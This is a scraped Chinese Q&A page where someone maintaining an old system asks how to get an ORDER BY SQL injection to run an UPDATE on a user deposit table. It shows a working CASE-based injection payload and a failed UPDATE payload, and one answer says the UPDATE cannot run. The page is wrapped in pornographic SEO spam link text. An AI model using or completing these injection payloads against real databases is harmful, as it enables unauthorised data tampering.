亚洲精品久久久中文字幕-亚洲精品久久片久久-亚洲精品久久青草-亚洲精品久久婷婷爱久久婷婷-亚洲精品久久午夜香蕉

您的位置:首頁技術文章
文章詳情頁

mysql - sql報錯原因?

瀏覽:85日期:2022-06-13 10:08:51

問題描述

發現一個正在維護的老系統的基于orderBy的sql注入漏洞,準備驗證一下,

我先執行這個sql注入,是可以的

SELECT sysitem_item.item_id FROM sysitem_item `sysitem_item` ORDER BY (selectcasewhen(1=1)then1else(select depositfrom sysuser_user_deposit)end)=1 ASC LIMIT 20 OFFSET 0

但是當我執行這個帶update語句的sql時報錯了:

SELECT sysitem_item.item_id FROM sysitem_item `sysitem_item` ORDER BY (selectcasewhen(1=1)then1else(updatesysuser_user_depositsetdeposit=11)end)=1 ASC LIMIT 20 OFFSET 0

報錯

<code>#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ’update<br>sysuser_user_deposit<br>set<br>deposit=11)end)=1 ASC LIMIT 20 OFFSET 0’ at line 9</code>

我應該如何讓他執行update?

問題解答

回答1:

主體是select的時候,里面是不能update的,否則執行不了的,mybatis這種注入我試過,<select>里執行update直接報錯,注入不了

相關文章:
主站蜘蛛池模板: 麻豆精品a在线观看 | 亚洲精品欧美综合四区 | 国产亚洲欧美日本一二三本道 | 亚洲视频在线观看网址 | 免费黄网址 | 国产欧美日韩综合精品二区 | 激情视频在线观看网站 | 亚洲精品香蕉一区二区 | 一区二区三区在线视频观看 | 欧美黄色免费 | 欧美毛片 | 成人五级毛片免费播放 | 国产人成亚洲第一网站在线播放 | 国产大尺度吃奶无遮无挡网 | 久久成人国产精品二三区 | 国内亚州视频在线观看 | 天天天天鲁天天拍一拍 | 欧美三级短视频 | 亚洲xxxx视频 | 日本亚洲成高清一区二区三区 | 国产成人18黄网站免费 | 精品区在线观看 | 久久精品国产6699国产精 | 青草资源视频在线高清观看 | 婷婷六月丁香色婷婷网 | 欧美一级特黄aa大片婷婷 | 欧美特级一级毛片 | 欧美成人一级毛片 | 久草在线播放视频 | 激情另类国内一区二区视频 | 正在播放avove深夜影院 | 一级特级片 | 91精品国产薄丝高跟在线看 | 国产综合在线视频 | 日韩a级大片 | 999色综合 | 大片免费观看入口 | 日鲁夜鲁鲁狠狠综合视频 | 国产a∨一区二区三区香蕉小说 | 一级特黄录像免费播放中文 | 国内自拍视频在线播放 |